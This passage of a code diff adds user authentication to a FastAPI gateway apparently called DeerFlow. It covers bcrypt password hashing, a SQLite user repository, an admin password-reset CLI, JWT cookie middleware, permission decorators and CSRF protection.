        return await self._repo.count_users()

    async def update_user(self, user: User) -> User:
        """Update an existing user."""
        return await self._repo.update_user(user)

    async def get_user_by_email(self, email: str) -> User | None:
        """Get user by email."""
        return await self._repo.get_user_by_email(email)
@@ -0,0 +1,41 @@
"""User Pydantic models for authentication."""

from datetime import UTC, datetime
from typing import Literal
from uuid import UUID, uuid4

from pydantic import BaseModel, ConfigDict, EmailStr, Field


def _utc_now() -> datetime:
    """Return current UTC time (timezone-aware)."""
    return datetime.now(UTC)


class User(BaseModel):
    """Internal user representation."""

    model_config = ConfigDict(from_attributes=True)

    id: UUID = Field(default_factory=uuid4, description="Primary key")
    email: EmailStr = Field(..., description="Unique email address")
    password_hash: str | None = Field(None, description="bcrypt hash, nullable for OAuth users")
    system_role: Literal["admin", "user"] = Field(default="user")
    created_at: datetime = Field(default_factory=_utc_now)

    # OAuth linkage (optional)
    oauth_provider: str | None = Field(None, description="e.g. 'github', 'google'")
    oauth_id: str | None = Field(None, description="User ID from OAuth provider")

    # Auth lifecycle
    needs_setup: bool = Field(default=False, description="True for auto-created admin until setup completes")
    token_version: int = Field(default=0, description="Incremented on password change to invalidate old JWTs")


class UserResponse(BaseModel):
    """Response model for user info endpoint."""

    id: str
    email: str
    system_role: Literal["admin", "user"]
    needs_setup: bool = False
@@ -0,0 +1,33 @@
"""Password hashing utilities using bcrypt directly."""

import asyncio

import bcrypt


def hash_password(password: str) -> str:
    """Hash a password using bcrypt."""
    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt()).decode("utf-8")


def verify_password(plain_password: str, hashed_password: str) -> bool:
    """Verify a password against its hash."""
    return bcrypt.checkpw(plain_password.encode("utf-8"), hashed_password.encode("utf-8"))


async def hash_password_async(password: str) -> str:
    """Hash a password using bcrypt (non-blocking).

    Wraps the blocking bcrypt operation in a thread pool to avoid
    blocking the event loop during password hashing.
    """
    return await asyncio.to_thread(hash_password, password)


async def verify_password_async(plain_password: str, hashed_password: str) -> bool:
    """Verify a password against its hash (non-blocking).

    Wraps the blocking bcrypt operation in a thread pool to avoid
    blocking the event loop during password verification.
    """
    return await asyncio.to_thread(verify_password, plain_password, hashed_password)
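A short illustrative sketch of the intended call pattern from async route code (standalone script form, not taken from the diff):

```python
import asyncio

from app.gateway.auth.password import hash_password_async, verify_password_async


async def demo() -> None:
    # The bcrypt work runs in a worker thread, keeping the event loop free.
    hashed = await hash_password_async("correct horse battery staple")
    assert await verify_password_async("correct horse battery staple", hashed)


asyncio.run(demo())
```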
@@ -0,0 +1,24 @@
"""Auth provider abstraction."""

from abc import ABC, abstractmethod


class AuthProvider(ABC):
    """Abstract base class for authentication providers."""

    @abstractmethod
    async def authenticate(self, credentials: dict) -> "User | None":
        """Authenticate user with given credentials.

        Returns User if authentication succeeds, None otherwise.
        """
        ...

    @abstractmethod
    async def get_user(self, user_id: str) -> "User | None":
        """Retrieve user by ID."""
        ...


# Import User at runtime to avoid circular imports
from app.gateway.auth.models import User  # noqa: E402
@@ -0,0 +1,97 @@
"""User repository interface for abstracting database operations."""

from abc import ABC, abstractmethod

from app.gateway.auth.models import User


class UserNotFoundError(LookupError):
    """Raised when a user repository operation targets a non-existent row.

    Subclass of :class:`LookupError` so callers that already catch
    ``LookupError`` for "missing entity" can keep working unchanged,
    while specific call sites can pin to this class to distinguish
    "concurrent delete during update" from other lookups.
    """


class UserRepository(ABC):
    """Abstract interface for user data storage.

    Implement this interface to support different storage backends
    (currently SQLite).
    """

    @abstractmethod
    async def create_user(self, user: User) -> User:
        """Create a new user.

        Args:
            user: User object to create

        Returns:
            Created User with ID assigned

        Raises:
            ValueError: If email already exists
        """
        ...

    @abstractmethod
    async def get_user_by_id(self, user_id: str) -> User | None:
        """Get user by ID.

        Args:
            user_id: User UUID as string

        Returns:
            User if found, None otherwise
        """
        ...

    @abstractmethod
    async def get_user_by_email(self, email: str) -> User | None:
        """Get user by email.

        Args:
            email: User email address

        Returns:
            User if found, None otherwise
        """
        ...

    @abstractmethod
    async def update_user(self, user: User) -> User:
        """Update an existing user.

        Args:
            user: User object with updated fields

        Returns:
            Updated User

        Raises:
            UserNotFoundError: If no row exists for ``user.id``. This is
                a hard failure (not a no-op) so callers cannot mistake a
                concurrent-delete race for a successful update.
        """
        ...

    @abstractmethod
    async def count_users(self) -> int:
        """Return total number of registered users."""
        ...

    @abstractmethod
    async def get_user_by_oauth(self, provider: str, oauth_id: str) -> User | None:
        """Get user by OAuth provider and ID.

        Args:
            provider: OAuth provider name (e.g. 'github', 'google')
            oauth_id: User ID from the OAuth provider

        Returns:
            User if found, None otherwise
        """
        ...
@@ -0,0 +1,122 @@
"""SQLAlchemy-backed UserRepository implementation.

Uses the shared async session factory from
``deerflow.persistence.engine`` — the ``users`` table lives in the
same database as ``threads_meta``, ``runs``, ``run_events``, and
``feedback``.

Constructor takes the session factory directly (same pattern as the
other four repositories in ``deerflow.persistence.*``). Callers
construct this after ``init_engine_from_config()`` has run.
"""

from __future__ import annotations

from datetime import UTC
from uuid import UUID

from sqlalchemy import func, select
from sqlalchemy.exc import IntegrityError
from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker

from app.gateway.auth.models import User
from app.gateway.auth.repositories.base import UserNotFoundError, UserRepository
from deerflow.persistence.user.model import UserRow


class SQLiteUserRepository(UserRepository):
    """Async user repository backed by the shared SQLAlchemy engine."""

    def __init__(self, session_factory: async_sessionmaker[AsyncSession]) -> None:
        self._sf = session_factory

    # ── Converters ────────────────────────────────────────────────────

    @staticmethod
    def _row_to_user(row: UserRow) -> User:
        return User(
            id=UUID(row.id),
            email=row.email,
            password_hash=row.password_hash,
            system_role=row.system_role,  # type: ignore[arg-type]
            # SQLite loses tzinfo on read; reattach UTC so downstream
            # code can compare timestamps reliably.
            created_at=row.created_at if row.created_at.tzinfo else row.created_at.replace(tzinfo=UTC),
            oauth_provider=row.oauth_provider,
            oauth_id=row.oauth_id,
            needs_setup=row.needs_setup,
            token_version=row.token_version,
        )

    @staticmethod
    def _user_to_row(user: User) -> UserRow:
        return UserRow(
            id=str(user.id),
            email=user.email,
            password_hash=user.password_hash,
            system_role=user.system_role,
            created_at=user.created_at,
            oauth_provider=user.oauth_provider,
            oauth_id=user.oauth_id,
            needs_setup=user.needs_setup,
            token_version=user.token_version,
        )

    # ── CRUD ──────────────────────────────────────────────────────────

    async def create_user(self, user: User) -> User:
        """Insert a new user. Raises ``ValueError`` on duplicate email."""
        row = self._user_to_row(user)
        async with self._sf() as session:
            session.add(row)
            try:
                await session.commit()
            except IntegrityError as exc:
                await session.rollback()
                raise ValueError(f"Email already registered: {user.email}") from exc
        return user

    async def get_user_by_id(self, user_id: str) -> User | None:
        async with self._sf() as session:
            row = await session.get(UserRow, user_id)
            return self._row_to_user(row) if row is not None else None

    async def get_user_by_email(self, email: str) -> User | None:
        stmt = select(UserRow).where(UserRow.email == email)
        async with self._sf() as session:
            result = await session.execute(stmt)
            row = result.scalar_one_or_none()
            return self._row_to_user(row) if row is not None else None

    async def update_user(self, user: User) -> User:
        async with self._sf() as session:
            row = await session.get(UserRow, str(user.id))
            if row is None:
                # Hard fail on concurrent delete: callers (reset_admin,
                # password change handlers, _ensure_admin_user) all
                # fetched the user just before this call, so a missing
                # row here means the row vanished underneath us. Silent
                # success would let the caller log "password reset" for
                # a row that no longer exists.
                raise UserNotFoundError(f"User {user.id} no longer exists")
            row.email = user.email
            row.password_hash = user.password_hash
            row.system_role = user.system_role
            row.oauth_provider = user.oauth_provider
            row.oauth_id = user.oauth_id
            row.needs_setup = user.needs_setup
            row.token_version = user.token_version
            await session.commit()
        return user

    async def count_users(self) -> int:
        stmt = select(func.count()).select_from(UserRow)
        async with self._sf() as session:
            return await session.scalar(stmt) or 0

    async def get_user_by_oauth(self, provider: str, oauth_id: str) -> User | None:
        stmt = select(UserRow).where(UserRow.oauth_provider == provider, UserRow.oauth_id == oauth_id)
        async with self._sf() as session:
            result = await session.execute(stmt)
            row = result.scalar_one_or_none()
            return self._row_to_user(row) if row is not None else None
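A wiring sketch, assuming ``init_engine_from_config()`` has already been awaited with a valid ``config.database`` (both names are taken from elsewhere in this diff; the function below is illustrative only):

```python
from app.gateway.auth.models import User
from app.gateway.auth.repositories.sqlite import SQLiteUserRepository
from deerflow.persistence.engine import get_session_factory


async def create_first_admin() -> User:
    sf = get_session_factory()      # available only after init_engine_from_config()
    assert sf is not None
    repo = SQLiteUserRepository(sf)
    user = User(email="admin@example.com", system_role="admin")
    return await repo.create_user(user)  # raises ValueError on duplicate email
```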
@@ -0,0 +1,91 @@
"""CLI tool to reset an admin password.

Usage:
    python -m app.gateway.auth.reset_admin
    python -m app.gateway.auth.reset_admin --email admin@example.com

Writes the new password to ``.deer-flow/admin_initial_credentials.txt``
(mode 0600) instead of printing it, so CI / log aggregators never see
the cleartext secret.
"""

from __future__ import annotations

import argparse
import asyncio
import secrets
import sys

from sqlalchemy import select

from app.gateway.auth.credential_file import write_initial_credentials
from app.gateway.auth.password import hash_password
from app.gateway.auth.repositories.sqlite import SQLiteUserRepository
from deerflow.persistence.user.model import UserRow


async def _run(email: str | None) -> int:
    from deerflow.config import get_app_config
    from deerflow.persistence.engine import (
        close_engine,
        get_session_factory,
        init_engine_from_config,
    )

    config = get_app_config()
    await init_engine_from_config(config.database)
    try:
        sf = get_session_factory()
        if sf is None:
            print("Error: persistence engine not available (check config.database).", file=sys.stderr)
            return 1

        repo = SQLiteUserRepository(sf)

        if email:
            user = await repo.get_user_by_email(email)
        else:
            # Find first admin via direct SELECT — repository does not
            # expose a "first admin" helper and we do not want to add
            # one just for this CLI.
            async with sf() as session:
                stmt = select(UserRow).where(UserRow.system_role == "admin").limit(1)
                row = (await session.execute(stmt)).scalar_one_or_none()
            if row is None:
                user = None
            else:
                user = await repo.get_user_by_id(row.id)

        if user is None:
            if email:
                print(f"Error: user '{email}' not found.", file=sys.stderr)
            else:
                print("Error: no admin user found.", file=sys.stderr)
            return 1

        new_password = secrets.token_urlsafe(16)
        user.password_hash = hash_password(new_password)
        user.token_version += 1
        user.needs_setup = True
        await repo.update_user(user)

        cred_path = write_initial_credentials(user.email, new_password, label="reset")
        print(f"Password reset for: {user.email}")
        print(f"Credentials written to: {cred_path} (mode 0600)")
        print("Next login will require setup (new email + password).")
        return 0
    finally:
        await close_engine()


def main() -> None:
    parser = argparse.ArgumentParser(description="Reset admin password")
    parser.add_argument("--email", help="Admin email (default: first admin found)")
    args = parser.parse_args()

    exit_code = asyncio.run(_run(args.email))
    sys.exit(exit_code)


if __name__ == "__main__":
    main()
@@ -0,0 +1,117 @@
"""Global authentication middleware — fail-closed safety net.

Rejects unauthenticated requests to non-public paths with 401. When a
request passes the cookie check, resolves the JWT payload to a real
``User`` object and stamps it into both ``request.state.user`` and the
``deerflow.runtime.user_context`` contextvar so that repository-layer
owner filtering works automatically via the sentinel pattern.

Fine-grained permission checks remain in authz.py decorators.
"""

from collections.abc import Callable

from fastapi import HTTPException, Request, Response
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import JSONResponse
from starlette.types import ASGIApp

from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse
from app.gateway.authz import _ALL_PERMISSIONS, AuthContext
from deerflow.runtime.user_context import reset_current_user, set_current_user

# Paths that never require authentication.
_PUBLIC_PATH_PREFIXES: tuple[str, ...] = (
    "/health",
    "/docs",
    "/redoc",
    "/openapi.json",
)

# Exact auth paths that are public (login/register/status check).
# /api/v1/auth/me, /api/v1/auth/change-password etc. are NOT public.
_PUBLIC_EXACT_PATHS: frozenset[str] = frozenset(
    {
        "/api/v1/auth/login/local",
        "/api/v1/auth/register",
        "/api/v1/auth/logout",
        "/api/v1/auth/setup-status",
    }
)


def _is_public(path: str) -> bool:
    stripped = path.rstrip("/")
    if stripped in _PUBLIC_EXACT_PATHS:
        return True
    return any(path.startswith(prefix) for prefix in _PUBLIC_PATH_PREFIXES)


class AuthMiddleware(BaseHTTPMiddleware):
    """Strict auth gate: reject requests without a valid session.

    Two-stage check for non-public paths:

    1. Cookie presence — return 401 NOT_AUTHENTICATED if missing
    2. JWT validation via ``get_current_user_from_request`` — return 401
       if the token is absent, malformed, expired, or the signed user
       does not exist / is stale

    On success, stamps ``request.state.user`` and the
    ``deerflow.runtime.user_context`` contextvar so that repository-layer
    owner filters work downstream without every route needing a
    ``@require_auth`` decorator. Routes that need per-resource
    authorization (e.g. "user A cannot read user B's thread by guessing
    the URL") should additionally use ``@require_permission(...,
    owner_check=True)`` for explicit enforcement — but authentication
    itself is fully handled here.
    """

    def __init__(self, app: ASGIApp) -> None:
        super().__init__(app)

    async def dispatch(self, request: Request, call_next: Callable) -> Response:
        if _is_public(request.url.path):
            return await call_next(request)

        # Non-public path: require session cookie
        if not request.cookies.get("access_token"):
            return JSONResponse(
                status_code=401,
                content={
                    "detail": AuthErrorResponse(
                        code=AuthErrorCode.NOT_AUTHENTICATED,
                        message="Authentication required",
                    ).model_dump()
                },
            )

        # Strict JWT validation: reject junk/expired tokens with 401
        # right here instead of silently passing through. This closes
        # the "junk cookie bypass" gap (AUTH_TEST_PLAN test 7.5.8):
        # without this, non-isolation routes like /api/models would
        # accept any cookie-shaped string as authentication.
        #
        # We call the *strict* resolver so that fine-grained error
        # codes (token_expired, token_invalid, user_not_found, …)
        # propagate from AuthErrorCode, not get flattened into one
        # generic code. BaseHTTPMiddleware doesn't let HTTPException
        # bubble up, so we catch and render it as JSONResponse here.
        from app.gateway.deps import get_current_user_from_request

        try:
            user = await get_current_user_from_request(request)
        except HTTPException as exc:
            return JSONResponse(status_code=exc.status_code, content={"detail": exc.detail})

        # Stamp both request.state.user (for the contextvar pattern)
        # and request.state.auth (so @require_permission's "auth is
        # None" branch short-circuits instead of running the entire
        # JWT-decode + DB-lookup pipeline a second time per request).
        request.state.user = user
        request.state.auth = AuthContext(user=user, permissions=_ALL_PERMISSIONS)
        token = set_current_user(user)
        try:
            return await call_next(request)
        finally:
            reset_current_user(token)
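The registration of this middleware is not shown in this hunk; a sketch under the assumption that it is added to the FastAPI app alongside the CSRF middleware (the ``AuthMiddleware`` module path below is assumed, and Starlette executes the last-added middleware first):

```python
from fastapi import FastAPI

from app.gateway.auth_middleware import AuthMiddleware  # module path assumed for this sketch
from app.gateway.csrf_middleware import CSRFMiddleware

app = FastAPI()
app.add_middleware(AuthMiddleware)   # inner: runs after the CSRF check
app.add_middleware(CSRFMiddleware)   # outer: added last, executed first
```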
@@ -0,0 +1,262 @@
"""Authorization decorators and context for DeerFlow.

Inspired by LangGraph Auth system: https://github.com/langchain-ai/langgraph/blob/main/libs/sdk-py/langgraph_sdk/auth/__init__.py

**Usage:**

1. Use ``@require_auth`` on routes that need authentication
2. Use ``@require_permission("resource", "action", owner_check=...)`` for permission checks
3. The decorator chain processes from bottom to top

**Example:**

    @router.get("/{thread_id}")
    @require_auth
    @require_permission("threads", "read", owner_check=True)
    async def get_thread(thread_id: str, request: Request):
        # User is authenticated and has threads:read permission
        ...

**Permission Model:**

- threads:read - View thread
- threads:write - Create/update thread
- threads:delete - Delete thread
- runs:create - Run agent
- runs:read - View run
- runs:cancel - Cancel run
"""

from __future__ import annotations

import functools
from collections.abc import Callable
from typing import TYPE_CHECKING, Any, ParamSpec, TypeVar

from fastapi import HTTPException, Request

if TYPE_CHECKING:
    from app.gateway.auth.models import User

P = ParamSpec("P")
T = TypeVar("T")


# Permission constants
class Permissions:
    """Permission constants for resource:action format."""

    # Threads
    THREADS_READ = "threads:read"
    THREADS_WRITE = "threads:write"
    THREADS_DELETE = "threads:delete"

    # Runs
    RUNS_CREATE = "runs:create"
    RUNS_READ = "runs:read"
    RUNS_CANCEL = "runs:cancel"


class AuthContext:
    """Authentication context for the current request.

    Stored in request.state.auth after require_auth decoration.

    Attributes:
        user: The authenticated user, or None if anonymous
        permissions: List of permission strings (e.g., "threads:read")
    """

    __slots__ = ("user", "permissions")

    def __init__(self, user: User | None = None, permissions: list[str] | None = None):
        self.user = user
        self.permissions = permissions or []

    @property
    def is_authenticated(self) -> bool:
        """Check if user is authenticated."""
        return self.user is not None

    def has_permission(self, resource: str, action: str) -> bool:
        """Check if context has permission for resource:action.

        Args:
            resource: Resource name (e.g., "threads")
            action: Action name (e.g., "read")

        Returns:
            True if user has permission
        """
        permission = f"{resource}:{action}"
        return permission in self.permissions

    def require_user(self) -> User:
        """Get user or raise 401.

        Raises:
            HTTPException 401 if not authenticated
        """
        if not self.user:
            raise HTTPException(status_code=401, detail="Authentication required")
        return self.user


def get_auth_context(request: Request) -> AuthContext | None:
    """Get AuthContext from request state."""
    return getattr(request.state, "auth", None)


_ALL_PERMISSIONS: list[str] = [
    Permissions.THREADS_READ,
    Permissions.THREADS_WRITE,
    Permissions.THREADS_DELETE,
    Permissions.RUNS_CREATE,
    Permissions.RUNS_READ,
    Permissions.RUNS_CANCEL,
]


async def _authenticate(request: Request) -> AuthContext:
    """Authenticate request and return AuthContext.

    Delegates to deps.get_optional_user_from_request() for the JWT→User pipeline.
    Returns AuthContext with user=None for anonymous requests.
    """
    from app.gateway.deps import get_optional_user_from_request

    user = await get_optional_user_from_request(request)
    if user is None:
        return AuthContext(user=None, permissions=[])

    # In future, permissions could be stored in user record
    return AuthContext(user=user, permissions=_ALL_PERMISSIONS)


def require_auth[**P, T](func: Callable[P, T]) -> Callable[P, T]:
    """Decorator that authenticates the request and sets AuthContext.

    Must be placed ABOVE other decorators (executes after them).

    Usage:
        @router.get("/{thread_id}")
        @require_auth  # Bottom decorator (executes first after permission check)
        @require_permission("threads", "read")
        async def get_thread(thread_id: str, request: Request):
            auth: AuthContext = request.state.auth
            ...

    Raises:
        ValueError: If 'request' parameter is missing
    """

    @functools.wraps(func)
    async def wrapper(*args: Any, **kwargs: Any) -> Any:
        request = kwargs.get("request")
        if request is None:
            raise ValueError("require_auth decorator requires 'request' parameter")

        # Authenticate and set context
        auth_context = await _authenticate(request)
        request.state.auth = auth_context

        return await func(*args, **kwargs)

    return wrapper


def require_permission(
    resource: str,
    action: str,
    owner_check: bool = False,
    require_existing: bool = False,
) -> Callable[[Callable[P, T]], Callable[P, T]]:
    """Decorator that checks permission for resource:action.

    Must be used AFTER @require_auth.

    Args:
        resource: Resource name (e.g., "threads", "runs")
        action: Action name (e.g., "read", "write", "delete")
        owner_check: If True, validates that the current user owns the resource.
            Requires 'thread_id' path parameter and performs ownership check.
        require_existing: Only meaningful with ``owner_check=True``. If True, a
            missing ``threads_meta`` row counts as a denial (404)
            instead of "untracked legacy thread, allow". Use on
            **destructive / mutating** routes (DELETE, PATCH,
            state-update) so a deleted thread can't be re-targeted
            by another user via the missing-row code path.

    Usage:
        # Read-style: legacy untracked threads are allowed
        @require_permission("threads", "read", owner_check=True)
        async def get_thread(thread_id: str, request: Request):
            ...

        # Destructive: thread row MUST exist and be owned by caller
        @require_permission("threads", "delete", owner_check=True, require_existing=True)
        async def delete_thread(thread_id: str, request: Request):
            ...

    Raises:
        HTTPException 401: If authentication required but user is anonymous
        HTTPException 403: If user lacks permission
        HTTPException 404: If owner_check=True but user doesn't own the thread
        ValueError: If owner_check=True but 'thread_id' parameter is missing
    """

    def decorator(func: Callable[P, T]) -> Callable[P, T]:
        @functools.wraps(func)
        async def wrapper(*args: Any, **kwargs: Any) -> Any:
            request = kwargs.get("request")
            if request is None:
                raise ValueError("require_permission decorator requires 'request' parameter")

            auth: AuthContext = getattr(request.state, "auth", None)
            if auth is None:
                auth = await _authenticate(request)
                request.state.auth = auth

            if not auth.is_authenticated:
                raise HTTPException(status_code=401, detail="Authentication required")

            # Check permission
            if not auth.has_permission(resource, action):
                raise HTTPException(
                    status_code=403,
                    detail=f"Permission denied: {resource}:{action}",
                )

            # Owner check for thread-specific resources.
            #
            # 2.0-rc moved thread metadata into the SQL persistence layer
            # (``threads_meta`` table). We verify ownership via
            # ``ThreadMetaStore.check_access``: it returns True for
            # missing rows (untracked legacy thread) and for rows whose
            # ``owner_id`` is NULL (shared / pre-auth data), so this is
            # strict-deny rather than strict-allow — only an *existing*
            # row with a *different* owner_id triggers 404.
            if owner_check:
                thread_id = kwargs.get("thread_id")
                if thread_id is None:
                    raise ValueError("require_permission with owner_check=True requires 'thread_id' parameter")

                from app.gateway.deps import get_thread_meta_repo

                thread_meta_repo = get_thread_meta_repo(request)
                allowed = await thread_meta_repo.check_access(
                    thread_id,
                    str(auth.user.id),
                    require_existing=require_existing,
                )
                if not allowed:
                    raise HTTPException(
                        status_code=404,
                        detail=f"Thread {thread_id} not found",
                    )

            return await func(*args, **kwargs)

        return wrapper

    return decorator
@@ -0,0 +1,112 @@
"""CSRF protection middleware for FastAPI.

Per RFC-001:
    State-changing operations require CSRF protection.
"""

import secrets
from collections.abc import Callable

from fastapi import Request, Response
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import JSONResponse
from starlette.types import ASGIApp

CSRF_COOKIE_NAME = "csrf_token"
CSRF_HEADER_NAME = "X-CSRF-Token"
CSRF_TOKEN_LENGTH = 64  # bytes


def is_secure_request(request: Request) -> bool:
    """Detect whether the original client request was made over HTTPS."""
    return request.headers.get("x-forwarded-proto", request.url.scheme) == "https"


def generate_csrf_token() -> str:
    """Generate a secure random CSRF token."""
    return secrets.token_urlsafe(CSRF_TOKEN_LENGTH)


def should_check_csrf(request: Request) -> bool:
    """Determine if a request needs CSRF validation.

    CSRF is checked for state-changing methods (POST, PUT, DELETE, PATCH).
    GET, HEAD, OPTIONS, and TRACE are exempt per RFC 7231.
    """
    if request.method not in ("POST", "PUT", "DELETE", "PATCH"):
        return False

    path = request.url.path.rstrip("/")
    # Exempt /api/v1/auth/me endpoint
    if path == "/api/v1/auth/me":
        return False
    return True


_AUTH_EXEMPT_PATHS: frozenset[str] = frozenset(
    {
        "/api/v1/auth/login/local",
        "/api/v1/auth/logout",
        "/api/v1/auth/register",
    }
)


def is_auth_endpoint(request: Request) -> bool:
    """Check if the request is to an auth endpoint.

    Auth endpoints don't need CSRF validation on first call (no token).
    """
    return request.url.path.rstrip("/") in _AUTH_EXEMPT_PATHS


class CSRFMiddleware(BaseHTTPMiddleware):
    """Middleware that implements CSRF protection using Double Submit Cookie pattern."""

    def __init__(self, app: ASGIApp) -> None:
        super().__init__(app)

    async def dispatch(self, request: Request, call_next: Callable) -> Response:
        _is_auth = is_auth_endpoint(request)

        if should_check_csrf(request) and not _is_auth:
            cookie_token = request.cookies.get(CSRF_COOKIE_NAME)
            header_token = request.headers.get(CSRF_HEADER_NAME)

            if not cookie_token or not header_token:
                return JSONResponse(
                    status_code=403,
                    content={"detail": "CSRF token missing. Include X-CSRF-Token header."},
                )

            if not secrets.compare_digest(cookie_token, header_token):
                return JSONResponse(
                    status_code=403,
                    content={"detail": "CSRF token mismatch."},
                )

        response = await call_next(request)

        # For auth endpoints that set up session, also set CSRF cookie
        if _is_auth and request.method == "POST":
            # Generate a new CSRF token for the session
            csrf_token = generate_csrf_token()
            is_https = is_secure_request(request)
            response.set_cookie(
                key=CSRF_COOKIE_NAME,
                value=csrf_token,
                httponly=False,  # Must be JS-readable for Double Submit Cookie pattern
                secure=is_https,
                samesite="strict",
            )

        return response


def get_csrf_token(request: Request) -> str | None:
    """Get the CSRF token from the current request's cookies.

    This is useful for server-side rendering where you need to embed
    the token in forms or headers.
    """
    return request.cookies.get(CSRF_COOKIE_NAME)
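A client-side sketch of the Double Submit Cookie handshake, using httpx purely for illustration; the login body shape and the change-password path are assumed from the auth router later in this diff:

```python
import httpx

with httpx.Client(base_url="http://localhost:8000") as client:
    # Login is CSRF-exempt; the response sets access_token and csrf_token cookies.
    client.post("/api/v1/auth/login/local", json={"email": "a@b.c", "password": "..."})
    csrf = client.cookies.get("csrf_token")
    # Every state-changing call must echo the cookie value in the X-CSRF-Token header.
    client.post(
        "/api/v1/auth/change-password",
        headers={"X-CSRF-Token": csrf},
        json={"current_password": "...", "new_password": "..."},
    )
```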
@@ -1,7 +1,8 @@
"""Centralized accessors for singleton objects stored on ``app.state``.

**Getters** (used by routers): raise 503 when a required dependency is
missing, except ``get_store`` which returns ``None``.
missing, except ``get_store`` and ``get_thread_meta_repo`` which return
``None``.

Initialization is handled directly in ``app.py`` via :class:`AsyncExitStack`.
"""
@@ -10,10 +11,15 @@ from __future__ import annotations

from collections.abc import AsyncGenerator
from contextlib import AsyncExitStack, asynccontextmanager
from typing import TYPE_CHECKING

from fastapi import FastAPI, HTTPException, Request

from deerflow.runtime import RunManager, StreamBridge
from deerflow.runtime import RunContext, RunManager

if TYPE_CHECKING:
    from app.gateway.auth.local_provider import LocalAuthProvider
    from app.gateway.auth.repositories.sqlite import SQLiteUserRepository


@asynccontextmanager
@@ -26,45 +32,194 @@ async def langgraph_runtime(app: FastAPI) -> AsyncGenerator[None, None]:
        yield
    """
    from deerflow.agents.checkpointer.async_provider import make_checkpointer
    from deerflow.config import get_app_config
    from deerflow.persistence.engine import close_engine, get_session_factory, init_engine_from_config
    from deerflow.runtime import make_store, make_stream_bridge
    from deerflow.runtime.events.store import make_run_event_store

    async with AsyncExitStack() as stack:
        app.state.stream_bridge = await stack.enter_async_context(make_stream_bridge())

        # Initialize persistence engine BEFORE checkpointer so that
        # auto-create-database logic runs first (postgres backend).
        config = get_app_config()
        await init_engine_from_config(config.database)

        app.state.checkpointer = await stack.enter_async_context(make_checkpointer())
        app.state.store = await stack.enter_async_context(make_store())
        app.state.run_manager = RunManager()
        yield

        # Initialize repositories — one get_session_factory() call for all.
        sf = get_session_factory()
        if sf is not None:
            from deerflow.persistence.feedback import FeedbackRepository
            from deerflow.persistence.run import RunRepository
            from deerflow.persistence.thread_meta import ThreadMetaRepository

            app.state.run_store = RunRepository(sf)
            app.state.feedback_repo = FeedbackRepository(sf)
            app.state.thread_meta_repo = ThreadMetaRepository(sf)
        else:
            from deerflow.persistence.thread_meta import MemoryThreadMetaStore
            from deerflow.runtime.runs.store.memory import MemoryRunStore

            app.state.run_store = MemoryRunStore()
            app.state.feedback_repo = None
            app.state.thread_meta_repo = MemoryThreadMetaStore(app.state.store)

        # Run event store (has its own factory with config-driven backend selection)
        run_events_config = getattr(config, "run_events", None)
        app.state.run_event_store = make_run_event_store(run_events_config)

        # RunManager with store backing for persistence
        app.state.run_manager = RunManager(store=app.state.run_store)

        try:
            yield
        finally:
            await close_engine()


# ---------------------------------------------------------------------------
# Getters – called by routers per-request
# Getters -- called by routers per-request
# ---------------------------------------------------------------------------


def get_stream_bridge(request: Request) -> StreamBridge:
    """Return the global :class:`StreamBridge`, or 503."""
    bridge = getattr(request.app.state, "stream_bridge", None)
    if bridge is None:
        raise HTTPException(status_code=503, detail="Stream bridge not available")
    return bridge
def _require(attr: str, label: str):
    """Create a FastAPI dependency that returns ``app.state.<attr>`` or 503."""

    def dep(request: Request):
        val = getattr(request.app.state, attr, None)
        if val is None:
            raise HTTPException(status_code=503, detail=f"{label} not available")
        return val

    dep.__name__ = dep.__qualname__ = f"get_{attr}"
    return dep


def get_run_manager(request: Request) -> RunManager:
    """Return the global :class:`RunManager`, or 503."""
    mgr = getattr(request.app.state, "run_manager", None)
    if mgr is None:
        raise HTTPException(status_code=503, detail="Run manager not available")
    return mgr


def get_checkpointer(request: Request):
    """Return the global checkpointer, or 503."""
    cp = getattr(request.app.state, "checkpointer", None)
    if cp is None:
        raise HTTPException(status_code=503, detail="Checkpointer not available")
    return cp
get_stream_bridge = _require("stream_bridge", "Stream bridge")
get_run_manager = _require("run_manager", "Run manager")
get_checkpointer = _require("checkpointer", "Checkpointer")
get_run_event_store = _require("run_event_store", "Run event store")
get_feedback_repo = _require("feedback_repo", "Feedback")
get_run_store = _require("run_store", "Run store")


def get_store(request: Request):
    """Return the global store (may be ``None`` if not configured)."""
    return getattr(request.app.state, "store", None)


get_thread_meta_repo = _require("thread_meta_repo", "Thread metadata store")


def get_run_context(request: Request) -> RunContext:
    """Build a :class:`RunContext` from ``app.state`` singletons.

    Returns a *base* context with infrastructure dependencies. Callers that
    need per-run fields (e.g. ``follow_up_to_run_id``) should use
    ``dataclasses.replace(ctx, follow_up_to_run_id=...)`` before passing it
    to :func:`run_agent`.
    """
    from deerflow.config import get_app_config

    return RunContext(
        checkpointer=get_checkpointer(request),
        store=get_store(request),
        event_store=get_run_event_store(request),
        run_events_config=getattr(get_app_config(), "run_events", None),
        thread_meta_repo=get_thread_meta_repo(request),
    )


# ---------------------------------------------------------------------------
# Auth helpers (used by authz.py and auth middleware)
# ---------------------------------------------------------------------------

# Cached singletons to avoid repeated instantiation per request
_cached_local_provider: LocalAuthProvider | None = None
_cached_repo: SQLiteUserRepository | None = None


def get_local_provider() -> LocalAuthProvider:
    """Get or create the cached LocalAuthProvider singleton.

    Must be called after ``init_engine_from_config()`` — the shared
    session factory is required to construct the user repository.
    """
    global _cached_local_provider, _cached_repo
    if _cached_repo is None:
        from app.gateway.auth.repositories.sqlite import SQLiteUserRepository
        from deerflow.persistence.engine import get_session_factory

        sf = get_session_factory()
        if sf is None:
            raise RuntimeError("get_local_provider() called before init_engine_from_config(); cannot access users table")
        _cached_repo = SQLiteUserRepository(sf)
    if _cached_local_provider is None:
        from app.gateway.auth.local_provider import LocalAuthProvider

        _cached_local_provider = LocalAuthProvider(repository=_cached_repo)
    return _cached_local_provider


async def get_current_user_from_request(request: Request):
    """Get the current authenticated user from the request cookie.

    Raises HTTPException 401 if not authenticated.
    """
    from app.gateway.auth import decode_token
    from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse, TokenError, token_error_to_code

    access_token = request.cookies.get("access_token")
    if not access_token:
        raise HTTPException(
            status_code=401,
            detail=AuthErrorResponse(code=AuthErrorCode.NOT_AUTHENTICATED, message="Not authenticated").model_dump(),
        )

    payload = decode_token(access_token)
